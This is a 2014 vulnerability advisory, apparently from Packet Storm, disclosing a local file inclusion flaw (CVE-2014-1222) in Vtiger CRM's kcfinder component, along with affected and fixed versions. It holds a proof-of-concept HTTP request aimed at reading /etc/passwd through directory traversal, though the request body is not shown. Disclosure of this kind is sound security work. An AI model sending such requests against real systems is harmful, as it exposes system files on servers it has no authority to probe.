Vtiger CRM 5.4.0 / 6.0 RC / 6.0.0 GA Local File Inclusion

Type packetstorm
Reporter Jerzy Kramarz
Modified 2014-03-12T00:00:00


                                            `Vulnerability title: Local File Inclusion in Vtiger CRM  
CVE: CVE-2014-1222  
Vendor: Vtiger  
Product: CRM  
Affected version: Vtiger CRM 5.4.0, 6.0 RC & 6.0.0 GA  
Fixed version: Vtiger CRM 6.0.0 Security patch 1  
Reported by: Jerzy Kramarz  
A local file inclusion vulnerability was discovered in the 'kcfinder'  
component of the vtiger CRM 6.0 RC. This could be exploited to include  
arbitrary files via directory traversal sequences and subsequently  
disclose contents of arbitrary files.  
The following request is a Proof-of-Concept for retrieving /etc/passwd file from remote system.  
POST /vtigercrm6rc2/kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1  
Proxy-Connection: keep-alive  
Content-Length: 58  
Cache-Control: max-age=0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36  
Content-Type: application/x-www-form-urlencoded  
DNT: 1  
Accept-Encoding: gzip,deflate,sdch  
Accept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4  
Cookie: PHPSESSID=ejkcv9cl3efa861460ufr39hl2; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off  
Note: In order to exploit this vulnerability an attacker has to be authenticated.  
Further details at:  
Copyright (c) Portcullis Computer Security Limited 2014, All rights  
reserved worldwide. Permission is hereby granted for the electronic  
redistribution of this information. It is not to be edited or altered in  
any way without the express written consent of Portcullis Computer  
Security Limited.  
The information herein contained may change without notice. Use of this  
information constitutes acceptance for use in an AS IS condition. There  
are NO warranties, implied or otherwise, with regard to this information  
or its use. Any use of this information is at the user's risk. In no  
event shall the author/distributor (Portcullis Computer Security  
Limited) be held liable for any damages whatsoever arising out of or in  
connection with the use or spread of this information.